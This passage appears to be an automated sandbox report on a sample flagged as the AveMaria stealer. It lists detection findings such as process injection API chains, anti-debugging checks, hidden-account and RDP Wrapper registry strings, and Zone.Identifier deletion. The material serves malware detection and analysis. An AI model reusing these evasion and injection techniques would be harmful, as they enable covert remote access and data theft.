                Source: msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeFile opened: C:\ProgramData\msimages.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\msimages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 1A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 4B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 4910000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 5E30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 6E30000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 440000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 4C90000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 5C90000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 6C90000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: B60000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 4BB0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 5BB0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 5CE0000 memory reserve | memory write watchJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 6CE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,6_2_0040DA5B
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\msimages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\msimages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-12006
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe TID: 3628Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe TID: 3576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe TID: 3604Thread sleep count: 60 > 30Jump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3736Thread sleep count: 60 > 30Jump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3736Thread sleep count: 54 > 30Jump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3736Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\ProgramData\msimages.exe TID: 2520Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3748Thread sleep count: 60 > 30Jump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\ProgramData\msimages.exe TID: 3868Thread sleep count: 60 > 30Jump to behavior
                Source: C:\ProgramData\msimages.exeLast function: Thread delayed
                Source: C:\ProgramData\msimages.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,6_2_00409DF6
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040FF27 FindFirstFileW,FindNextFileW,6_2_0040FF27
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,6_2_0041002B
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\msimages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\ProgramData\msimages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeAPI call chain: ExitProcess graph end nodegraph_6-9227
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeAPI call chain: ExitProcess graph end nodegraph_6-10895
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess queried: DebugPortJump to behavior
                Source: C:\ProgramData\msimages.exeProcess queried: DebugPortJump to behavior
                Source: C:\ProgramData\msimages.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040FA42 LoadLibraryA,GetProcAddress,6_2_0040FA42
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0041094E mov eax, dword ptr fs:[00000030h]6_2_0041094E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00419172 mov eax, dword ptr fs:[00000030h]6_2_00419172
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00410619 mov eax, dword ptr fs:[00000030h]6_2_00410619
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00410620 mov eax, dword ptr fs:[00000030h]6_2_00410620
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00401085 GetProcessHeap,RtlAllocateHeap,6_2_00401085
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess token adjusted: DebugJump to behavior
                Source: C:\ProgramData\msimages.exeProcess token adjusted: DebugJump to behavior
                Source: C:\ProgramData\msimages.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code contains process injector
                Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.cs.Net Code: TeAiTwzrmZn contains injection code
                Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BrzJShYQfEn.cs.Net Code: TdEVEpVfUam contains injection code
                Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, WiVLTGXGqZY.cs.Net Code: oUaYGOUWfvW contains injection code
                .NET source code references suspicious native API functions
                Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.csReference to suspicious API methods: OlSVdbZdJVXOVw<tQuiNW>("kernel32", "VirtualAllocEx")
                Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.csReference to suspicious API methods: OlSVdbZdJVXOVw<yCUTOQ>("ntdll", "NtWriteVirtualMemory")
                Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.csReference to suspicious API methods: OlSVdbZdJVXOVw<efnUBk>("ntdll", "NtSetContextThread")
                Contains functionality to inject threads in other processes
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004079E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,6_2_004079E8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00411FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_2_00411FD8
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\msimages.exeMemory written: C:\ProgramData\msimages.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\msimages.exeMemory written: C:\ProgramData\msimages.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\ProgramData\msimages.exeMemory written: C:\ProgramData\msimages.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe6_2_004120B8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeProcess created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"Jump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\ProgramData\msimages.exeProcess created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004118BA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,6_2_004118BA
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040F56D AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,6_2_0040F56D
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040F93F cpuid 6_2_0040F93F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe VolumeInformationJump to behavior
                Source: C:\ProgramData\msimages.exeQueries volume information: C:\ProgramData\msimages.exe VolumeInformationJump to behavior
                Source: C:\ProgramData\msimages.exeQueries volume information: C:\ProgramData\msimages.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040882F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,GetLocalTime,wsprintfW,lstrcatW,CreateFileW,CloseHandle,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,6_2_0040882F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Increases the number of concurrent connection per server for Internet Explorer
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
